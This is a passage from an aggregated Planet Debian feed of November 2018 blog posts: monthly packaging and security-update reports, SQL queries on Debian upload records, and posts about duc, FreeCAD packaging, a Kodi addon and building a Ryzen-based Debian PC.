  • Several games failed to build from source because freetype-config is gone and pkg-config must be used from now on. That required RC bug fixes in asc (#887600),  brutalchess (#892337, patch by Reiner Herrmann), cube2font (#892330, patch by Reiner Herrmann with additional updates by Martin Erik Werner) and scorched3d (#892434, patch by Adrian Bunk)
  • I packaged new upstream versions of pcsx2, a Playstation 2 emulator, to fix RC bug #907411, also pygame-sdl2, renpy and bzflag.
  • I refreshed the packaging of abe, asc-music, amoebax, angrydd, airstrike, burgerspace, berusky2 and berusky-data.
  • Dima Kogan approached me about improving the current Bullet packaging and provided patches to build the double-precision library versions too.  Bullet is a state-of-the-art C++ library for 3D collision detection, soft body and rigid body dynamics. I once introduced it to Debian because it was a required build-dependency of freeorion. Nowadays it powers several scientific applications. I still maintain it because I think it is a very useful library, e.g. used among others by openrobotics.
  •  I spent most of the time this month on updating Teeworlds. Since I run a Teeworlds server myself I discovered a remote denial-of-service vulnerability first hand. Of course my server was not the only target and the upstream developers  had already released a fix. But I only got aware of it by chance. So I requested CVE-2018-18541, packaged the latest upstream release 0.7.0 and also prepared a security update for Stretch, released as DSA-4329-1.
  • Last but not least I sponsored a new game created and prepared by Gerardo Ballabio called galois. It is a tetris-like game with special features like 3D and different brick shapes. It is currently waiting in the NEW queue.
Debian Java Misc
  • I sponsored android-platform-system-core for Kai-Chung Yan and did a non-maintainer upload for eboard, a chess client to fix RC bug #893167. I forwarded some patches and I hope we will see another upstream release in the near future that addresses some issues.
  • I packaged a new upstream release of ublock-origin.
Debian LTS

This was my thirty-second month as a paid contributor and I have been paid to work 30 hours on Debian LTS, a project started by Raphaël Hertzog. In that time I did the following:

  • From 08.10.2018 until 14.10.2018 and 29.10.2018 until 4.11.2018 I was in charge of our LTS frontdesk. I investigated and triaged CVE in gnulib, otrs2, tcpreplay, net-snmp, ghostscript, paramiko, pyopenssl, qpdf, requests, glassfish, imagemagick, tomcat8, tomcat7, moin, glusterfs, mono, tiff, systemd, network-manager, shellinabox, openssl, curl, squid3, icecast2, sdl-image1.2, libsdl2-image, mkvtoolnix, libapache-mod-jk, mariadb-10.0, mysql-connector-java and jasper.
  • There was a problem with our list manager and some announcements could not be preserved.
  • DLA-1535-1. Issued a security update for php-horde fixing 1 CVE.
  • DLA-1536-1. Issued a security update for php-horde-core fixing 1 CVE.
  • DLA-1537-1. Issued a security update for php-horde-kronolith fixing 1 CVE.
  • DLA-1540-1. Issued a security update for net-snmp fixing 1 CVE.
  • DLA-1543-1. Issued a security update for gnulib fixing 1 CVE.
  • DLA-1544-1. Issued a security update for tomcat7 fixing 1 CVE.
  • DLA-1545-1. Issued a security update for tomcat8 fixing 1 CVE.
  • DLA-1546-1. Issued a security update for moin fixing 1 CVE.
  • DLA-1552-1. Issued a security update for ghostscript fixing 3 CVE.
  • DLA-1564-1. Issued a security update for mono fixing 1 CVE.
  • DLA-1565-1. Issued a security update for glusterfs fixing 5 CVE.
ELTS

Extended Long Term Support (ELTS) is a project led by Freexian to further extend the lifetime of Debian releases. It is not an official Debian project but all Debian users benefit from it without cost. The current ELTS release is Debian 7 „Wheezy“. This was my fifth month and I have been paid to work 15  hours on ELTS.

  • I was in charge of our ELTS frontdesk from 15.10.2018 until 21.10.2018 and I triaged CVE in chromium-browser, ghostscript, openexr, unzip, virtualbox, elfutils, liblivemedia, exiv2, movabletype-opensource, quemu, quemu-kvm, tiff and tcpreplay.
  • ELA-50-1. Issued a security update for linux fixing 34 CVE.
  • ELA-51-1. Issued a security update for tomcat7 fixing 1 CVE.
  • ELA-54-1. Issued a security update for curl fixing 1 CVE.
  • ELA-55-1. Issued a security update for firmware-nonfree fixing 8 CVE.

Thanks for reading and see you next time.

Apo https://gambaru.de/blog planetdebian – gambaru.de

Record number of uploads of a Debian package in an arbitrary 24-hour window

Enj, 08/11/2018 - 11:56md

Since Dimitri has given me the SQL virus I have a hard time avoiding opportunities for twisting my brain.

Seeing the latest post from Chris Lamb made me wonder: how hard would it be to do better? Splitting by date is rather arbitrary (the split may even depend on the timezone you’re using when you’re doing the query), so let’s try to find out the maximum number of uploads that happened for each package in any 24 hour window.

First, for each upload, we get how many uploads of the same package happened in the subsequent 24 hours.

SELECT source, date, ( SELECT count(*) FROM upload_history AS other_upload WHERE other_upload.source = first_upload.source AND other_upload.date >= first_upload.date AND other_upload.date < first_upload.date + '24 hours') AS count FROM upload_history AS first_upload

For each source package, we want the maximum count of uploads in a 24 hour window.

SELECT source, max(count) FROM upload_counts GROUP BY source

We can then join both queries together, to get the 24-hour window in which the most uploads of a given source package has happened.

WITH upload_counts AS ( SELECT source, date, ( SELECT count(*) FROM upload_history AS other_upload WHERE other_upload.source = first_upload.source AND other_upload.date >= first_upload.date AND other_upload.date < first_upload.date + '24 hours') AS count FROM upload_history AS first_upload ) SELECT source, date, count FROM upload_counts INNER JOIN ( SELECT source, max(count) AS max_uploads FROM upload_counts GROUP BY source ) AS m USING (source) WHERE count = max_uploads AND max_uploads >= 9 ORDER BY max_uploads DESC, date ASC;

The results are almost the ones Chris has found, but cl-sql and live-config now have one more upload than live-boot.

source | date | count --------------------+------------------------+------- cl-sql | 2004-04-17 03:34:52+00 | 14 live-config | 2010-07-15 17:19:11+00 | 14 live-boot | 2010-07-15 17:17:07+00 | 13 zutils | 2010-12-30 17:33:45+00 | 11 belocs-locales-bin | 2005-03-20 21:05:44+00 | 10 openerp-web | 2010-12-30 17:32:07+00 | 10 debconf | 1999-09-25 18:52:37+00 | 9 gretl | 2000-06-16 18:53:11+00 | 9 posh | 2002-07-24 17:04:46+00 | 9 module-assistant | 2003-09-11 05:53:18+00 | 9 live-helper | 2007-04-20 18:16:38+00 | 9 dxvk | 2018-11-06 00:04:02+00 | 9 (12 lines)

Thanks to Adrian and Chris for the involuntary challenge!

olasd https://blog.olasd.eu english – olasd's corner of the 'tubes

Record number of uploads of a Debian package in a day

Enj, 08/11/2018 - 10:43md

Previously, on IRC...

* bunk looks at dxvk and wonders whether 9 uploads of a package on 1 day are a record

According to the Ultimate Debian Database, it turns out it isn't:

udd=> SELECT source, DATE(date) as day, COUNT(source) FROM upload_history GROUP BY (source, day) ORDER BY count DESC LIMIT 10; source | day | count --------------------+------------+------- live-config | 2010-07-15 | 13 live-boot | 2010-07-15 | 13 cl-sql | 2004-04-17 | 13 zutils | 2010-12-30 | 11 openerp-web | 2010-12-30 | 10 belocs-locales-bin | 2005-03-20 | 10 debconf | 1999-09-25 | 9 dxvk | 2018-11-06 | 9 live-helper | 2007-04-20 | 9 module-assistant | 2003-09-11 | 9 (10 rows) Chris Lamb https://chris-lamb.co.uk/blog/category/planet-debian lamby: Items or syndication on Planet Debian.

duc

Enj, 08/11/2018 - 8:44md

duc's GUI view

Continuing a series of blog posts about Debian packages I have adopted (starting with smartmontools), in January this year I adopted duc ("Dude, where are my bytes?")

duc is a tool to record and visualise disk space usage. Recording and visualising are performed separately, meaning the latter is very fast. There are several visualisers available. The three most interesting ones are

  • duc ui, a text terminal/ncurses-based heirarchical browser
  • duc gui, a GUI/X11 application
  • duc cgi, a CGI for access with a web browser

The GUI and CGI resemble the fantastic Filelight KDE tool, which I've always preferred to the similar tools available for GNOME, Windows or macOS. (duc itself works fine on macOS). The CGI could be deployed on my NAS, but I haven't set it up yet.

Indexing is performed via duc index <path> and seems very quick when compared to something like du -sh. The index is stored in a local database.

I adopted duc in sad circumstances after the prior maintainer decided to step down, in response to a discussion we had about a feature request for the Debian package. This wasn't the outcome I wanted, but it's a package I use regularly on several machines so I stepped up to adopt it.

jmtd https://jmtd.net/log/ Jonathan Dowland's Weblog

New Debian Developers and Maintainers (September and October 2018)

Enj, 08/11/2018 - 2:00md

The following contributors got their Debian Developer accounts in the last two months:

  • Joseph Herlant (aerostitch)
  • Aurélien Couderc (coucouf)
  • Dylan Aïssi (daissi)
  • Kunal Mehta (legoktm)
  • Ming-ting Yao Wei (mwei)
  • Nicolas Braud-Santoni (nicoo)
  • Pierre-Elliott Bécue (peb)
  • Stephen Gelman (ssgelm)
  • Daniel Echeverry (epsilon)
  • Dmitry Bogatov (kaction)

The following contributors were added as Debian Maintainers in the last two months:

  • Sagar Ippalpalli
  • Kurt Kremitzki
  • Michal Arbet
  • Peter Wienemann
  • Alexis Bienvenüe
  • Gard Spreemann

Congratulations!

Jean-Pierre Giraud https://bits.debian.org/ Bits from Debian

New and improved Frikanalen Kodi addon version 0.0.3

Enj, 08/11/2018 - 10:30pd

If you read my blog regularly, you probably know I am involved in running and developing the Norwegian TV channel Frikanalen. It is an open channel, allowing everyone in Norway to publish videos on a TV channel with national coverage. You can think of it as Youtube for national television. In addition to distribution on RiksTV and Uninett, Frikanalen is also available as a Kodi addon. The last few days I have updated the code to add more features. A new and improved version 0.0.3 Frikanalen addon was just made available via the Kodi repositories. This new version include a option to browse videos by category, as well as free text search in the video archive. It will now also show the video duration in the video lists, which were missing earlier. A new and experimental link to the HD video stream currently being worked on is provided, for those that want to see what the CasparCG output look like. The alternative is the SD video stream, generated using MLT. CasparCG is controlled by our mltplayout server which instead of talking to mlt is giving PLAY instructions to the CasparCG server when it is time to start a new program.

By now, you are probably wondering what kind of content is being played on the channel. These days, it is filled with technical presentations like those from NUUG, Debconf, Makercon, and TED, but there are also some periods with EMPT TV and P7.

As usual, if you use Bitcoin and want to show your support of my activities, please send Bitcoin donations to my address 15oWEoG9dUPovwmUL9KWAnYRtNJEkP1u1b.

Petter Reinholdtsen http://people.skolelinux.org/pere/blog/ Petter Reinholdtsen - Entries tagged english

Free Software Activities in October 2018

Enj, 08/11/2018 - 6:59pd
Intro

Welcome to another monthly summary of my free software work. Currently I'm focusing on improving the state of packaging for FreeCAD and its ecosystem of dependencies and related packages in Debian Science. Additionally, I recently revived the FreeCAD Community Extras PPA as a way of staging these packages out to users for testing. If you are a FreeCAD user, developer, or simply a user of one of these packages, I would greatly appreciate your feedback and testing to identify bugs while my packages wait to make it into the Debian archive.

However, in the long-term, I plan to move away from spending so much time on Debian packaging and returning to FreeCAD core development, and a special not-so-secret related project: PostCAD, providing OpenCASCADE geometry & topology bindings plus CAD data and filetype format support for PostgreSQL, a la PostGIS. The goal is to build this out as a rich backend which FreeCAD can talk to about neat CAD stuff. It's a heaping of work, though, so I don't expect to have a public release until mid or late 2019.

I would like to find others who are interested in contributing to FreeCAD ecosystem packaging for mentorship. That way, my efforts are maintained by the community and the quality and availability of packages won't wane with my attention on them. Since FreeCAD participates in Google Summer of Code, this would be a great opportunity for interested university students to learn Debian packaging and improve the state of science & engineering software on Debian.

Anyway, on to my summary!

Debian News

This month, I officially became a Debian Maintainer. This is a basic level of formal membership in the Debian project, and it comes with limited upload rights to the archive. I can only upload packages for which I am marked as a maintainer, for example FreeCAD.

I took advantage of this to upload some improvements for FreeCAD which I had been sitting on. After a few tweaks, the package was ready for an upgraded upload from Experimental to Unstable, which begins the process of candidacy for Testing, the release pocket for the upcoming Debian 10.

Debian FreeCAD Gets Qt 5

Most important about this upload, though was that FreeCAD is finally being built with Qt 5 support. While Qt 5 had been working for quite a while, we were waiting on a dependency to be uploaded to Debian, PySide 2, which finally was uploaded this summer. Because this is a big switch to flip, any testing and reporting of bugs for this Debian package would be appreciated!

FreeCAD Package Structure Reorganization

One of the other major packaging changes for FreeCAD 0.17 is that the package is no longer a single, monolithic freecad package. We now have:

  • a freecad metapackage, which installs the other packages
  • common files and resources (e.g. images) in freecad-common
  • freecad-runtime contains Python 2/3 compatible runtime files
  • the executable built against Python 2, freecad-python2
  • and the library files used by the executable, libfreecad-python2-0.17

There are several advantages to this approach. The first is that since freecad-common and freecad-runtime are just pictures, Python scripts, and the like, we can save space in the archive by only needing one copy of the package, instead of one for each supported architecture. For freecad-python2 and libfreecad-python2-0.17, one can see the advantage in the name: since these are Python 2 specific, we will soon be able to provide their Python 3 counterparts.

Ideally, by the time of the Debian 10 release, the FreeCAD 0.17 package will provide both Python 2 and 3 supported versions, and which one you want to use can be switched between using the alternatives system, which I will explain later in this post.

FreeCAD Python 3 Imminent

Like Qt 5, FreeCAD has supported Python 3 for quite some time. (Workbenches and 3rd party code are another story.) However, in Debian, a Python 3-enabled FreeCAD package is blocked by the pending upload of pivy 0.6. I helped coordinate the upstream release of this package but due to issues with its dependency Coin3D the upload is stalled until those issues are resolved.

Community Extras PPA - Early Packge Previews

Now that we have the Community Extras PPA, it serves as a convenient location for me to upload packages as soon as I have one completed and ready for testing. Here are my uploads this month.

Gmsh 4

Gmsh has released a major version upgrade, which includes removing the experimental Java API and introducing Julia bindings, although this package doesn't do anything with them. The current version in the Debian archives is 3.0.6.

This package is only available on Bionic (Ubuntu 18.04) due to its dependencies. I hadn't tried on Cosmic (Ubuntu 18.10) since I worked on this in the beginning of October and it wasn't released yet.

Calculix 2.14

CalculiX in Debian is currently several versions behind (2.11) so I got a request to package this. However, CalculiX actually spans several packages, but calculix-ccx, the solver, is the only one used by FreeCAD, so unlike the other packages, this one is not quite ready for Debian until the other ones are done as well, since they are separate source packages.

This package is available on Bionic and Xenial (Ubuntu 16.04).

Translated FreeCAD-Doc Packages

One of the big areas for improvement in FreeCAD is the state of its documentation, and I'm glad to announce that one big improvement is on its way. I have been working on a standalone freecad-doc package, since it was removed from the Debian archive for being derived from pre-compiled binary files. This package involves using a local synced copy of the FreeCAD Wiki text and images, and using the script that was used to generate the aforementioned binary files.

The main improvement my package offers is support for the two most complete translations of the FreeCAD wiki, French and Italian. This is accomplished by making freecad-doc a metapackage which depends on any one of freecad-doc-en, -it, or -fr being installed. Then, the relevant files in freecad-doc upon which freecad will call are in fact managed symlinks to the appropriate translations. The symlinks are managed by the DebianAlternatives system (see update-alternatives(1).)

In order to switch between translations if more than one is installed, you can run sudo update-alternatives --config freecad-doc. This will control the in-program help for FreeCAD, so when you click the "What's this?" button, the resultant help page will be the translated version.

Additionally, compiled PDFs of the FreeCAD help are provided for all three languages.

One result of the nature of this package is that it is quite large: each freecad-doc translated package weighs in about 300 MB so the combined size is about 1.2 GB, per Ubuntu distribution.

As a result, this package is only available on Bionic and Xenial.

PyCOLLADA 0.6, now with Python 3!

Another package which is fairly out of date in Debian (version 0.4 present), I decided to update it since pycollada is a dependency of FreeCAD and I am intrigued by the possibilities of the COLLADA (COLLAborative Design Activity) format. This allows for interchange with interactive 3D applications like Blender.

The big news with this package is that Python 3 support is now available, so I updated the source packaging to provide both Python 2 and 3 packages.

Again due to dependencies, it's only available on Cosmic and Bionic.

Sponsors

My work on Debian Science and FreeCAD is supported by my patrons at https://patreon.com/kkremitzki. Thank you all very much!

If you appreciate my work as described in this post, any level of support is greatly appreciated, including moral support!

Social Media

You can follow me on Twitter at @thekurtwk. I'm also currently working on a Twitch streaming setup, which I hope to have ready by the end of the year! I'll be trying out some live programming, engineering, and Linux gaming. You can find me at twitch.tv/kkremitzki.

Kurt Kremitzki https://kkremitzki.github.io/ Biosystems Engineering Blog (Posts about debian)

AMD Ryzen 5 2400G on Debian

Enj, 08/11/2018 - 3:15pd

Today at work I built two new computers for co-workers. They were (rightfully so) complaining the 2008 iMacs they were using were getting old and slow.

I can't help but be a little sad about it. These computers are still pretty usable for light tasks and are in overall pretty good shape. To be honest, I'm not sure what I'll be doing with them.

Tasked with the job of building new computers at a reasonable price, I decided to go with the latest AMD CPU, the Ryzen 5 2400G. This is the second generation of Ryzen chips and it includes an APU, thus negating the need to buy a discrete GPU.

This chip is pretty recent so the support in Stretch isn't great. The APU graphics stack was too recent to be supported by the 4.9 stable kernel, so I had to install 4.18 from the backports.

I also had to install the xserver-xorg-video-amdgpu driver from testing, as AMD's Vega arch wasn't a thing when Stretch came out. Although AMD did the right thing and used FOSS drivers for their Vega GPU lineup, you still need proprietary firmware (firmware-amd-graphics) for the APU to be fully supported.

It was my first time using NVME SSDs, and oh boy are those fast. I was sceptical at first (SATA SSDs are pretty fast, right?) but the difference in snap really is noticeable. I now regret I didn't put that in my desktop at home when I replaced my SSD 6 months ago...

All in all I'm pretty happy with the final result. The performance of the Ryzen 5 2400G is good and the price of the overall build was reasonable.

Louis-Philippe Véronneau https://veronneau.org/ Louis-Philippe Véronneau

Faqet